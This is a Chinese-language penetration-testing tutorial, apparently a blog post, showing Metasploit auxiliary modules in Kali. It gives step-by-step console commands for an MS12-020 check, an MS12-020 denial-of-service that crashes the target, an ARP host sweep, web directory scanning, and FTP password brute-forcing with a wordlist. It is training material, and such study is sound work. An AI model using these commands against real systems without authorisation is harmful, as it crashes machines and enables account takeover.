介绍:本文是展示在Kali中通过使用metasploit工具的auxiliary辅助模块进行渗透测试的流程(也可以在windows系统中下载metasploit工具进行相关操作),工具详细教程可在Sangfor学习平台获取临时免费课程进行学习。
挂个链接:深信服产业教育中心
auxiliary(辅助模块)
路径目录:usr/share/metasploit-framework/modules/auxiliary
1.通过使用auxiliary模块中的check模块来进行漏洞检测,查看该主机是否存在该漏洞
示例:主机是否存在ms12-020漏洞
use auxiliary/scanner/rdp/ms12_020_check //使用ms_12_020_check模块
show options //查看该模块需要哪些参数
set RHOST ip address //设置目标主机IP地址
run //执行漏洞检测
出现以下结果,则证明目标主机存在该漏洞
2.通过使用maxchannelids模块利用漏洞进行dos(分布式拒绝服务)攻击
示例:通过上述检测出来存在的ms12-020漏洞进行利用,对该目标主机发动dos攻击使主机蓝屏死机
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids //使用ms12_020_maxchannelids模块
show options //查看该模块需要设置哪些参数
set RHOST ip address //设置目标主机IP地址
run //执行漏洞利用,发动dos攻击
成功后电脑会蓝屏或死机被dos攻击的现象
3.通过使用arp_sweep模块进行网络主机存活扫描
路径目录:../auxiliary/scanner/discovery/arp_sweep
use auxiliary/scanner/discovery/arp_sweep //使用arp_sweep模块
show options //查看该模块需要设置哪些参数
set RHOST ip address //设置目标主机IP地址
set thread 10 //把攻击线程数设置成10个
run //执行扫描
若出现appears to be up 则对应的目标主机当前处于存活状态
4.通过使用dir_scanner模块进行web目录扫描(和3流程类似)
路径目录:../auxiliary/scanner/http/dir_scanner
use auxiliary/scanner/http/dir_scanner //使用dir_scanner模块
show options //查看该模块需要设置哪些参数
set RHOST ip address //设置目标主机IP地址
set thread 10 //把攻击线程数设置成10个
run //执行扫描
扫描结果如下示例(这里扫描结果应该是扫出来了phpMyadmin的目录,响应码200证明真实性很大):
5.通过使用ftp_login模块进行FTP登录密码爆破
路径目录:auxiliary/scanner/ftp/ftp_login
use auxiliary/scanner/ftp/ftp_login //使用ftp_login模块
show options //查看该模块需要设置哪些参数
set USERNAME 用户名 //设置登录的用户名
set PASS FILE //usr/share/wordlist/fasttrack.txt 设置使用的密码爆破字典文本(这里用的是fastrack.txt)
set thread 20 //把攻击线程数设置成20个
run //执行扫描
爆破结果如下示例,出现Login Successful 以及登录密码则证明爆破成功,获取FTP登陆能力